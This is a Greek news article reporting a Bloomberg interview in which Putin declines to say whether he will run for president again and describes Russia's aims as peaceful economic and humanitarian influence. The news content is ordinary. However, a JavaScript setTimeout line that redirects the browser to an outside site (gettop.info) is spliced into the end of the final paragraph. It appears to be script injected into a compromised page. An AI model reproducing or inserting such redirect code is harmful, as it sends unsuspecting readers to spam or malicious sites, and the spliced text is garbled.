Πούτιν: Πολύ νωρίς να ανακοινώσω εάν θα είμαι υποψήφιος πρόεδρος

0
2

 

O Βλαντίμιρ Πούτιν σε συνέντευξή του στο Bloomberg δεν θέλησε να ανοίξει τα χαρτιά του σχετικά με το αν θα είναι υποψήφιος και για άλλη μια θητεία, ενώ παράλληλε τόνισε ότι είναι «πολύ νωρίς» να γίνει συζήτηση για τις ρωσικές προεδρικές εκλογές,

«Βρισκόμαστε τώρα λίγο πριν από τις βουλευτικές εκλογές. Πρέπει να διεξάγουμε αυτές τις εκλογές, να δούμε τα αποτελέσματα. Αλλά μετά από αυτές, θα ακολουθήσουν σχεδόν δύο χρόνια. Άρα είναι πολύ νωρίς να μιλάμε γι΄αυτό«, δήλωσε ο Ρώσος πρόεδρος στο πρακτορείο ειδήσεων. «Δεν έχω ακόμη αποφασίσει για μένα«, είπε.

Σε ερώτηση αν ο μελλοντικός Ρώσος πρόεδρος μπορεί να εκπροσωπεί μια νεότερη γενιά πολιτικών, ο Πούτιν απάντησε: «Ναι, βέβαια. Νομίζω ότι ένας μελλοντικός ηγέτης πρέπει να είναι αρκετά νέος αλλά ώριμος«.

Ο Πούτιν δήλωσε ακόμη ότι οι ρωσικές αρχές θα ήθελαν να δουν την επιρροή της Ρωσίας να γίνεται πιο αισθητή και πιο σημαντική αλλά θα επιδιώξουν κάτι τέτοιο μόνο με ειρηνικά μέσα.

«Το θέμα δεν είναι καθόλου το έδαφος. Και σε όρους επιρροής, ναι, θα θέλαμε η επιρροή της Ρωσίας να είναι πιο αισθητή, πιο σημαντική, αλλά δίνουμε απολύτως ειρηνικό και θετικό περιεχόμενο σε αυτό: οικονομική επιρροή, ανθρωπιστική επιρροή, η επιρροή που απορρέει από την ανάπτυξη ίσης συνεργασίας με τους γείτονές μας. Και αυτό είναι στο οποίο αποσκοπεί η εξωτερική πολιτική μας. Και κανείς δεν πρέπει να αμφιβάλλει γι’ αυτό«, δήλωσε ο Πούτιν στο Bloomberg. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here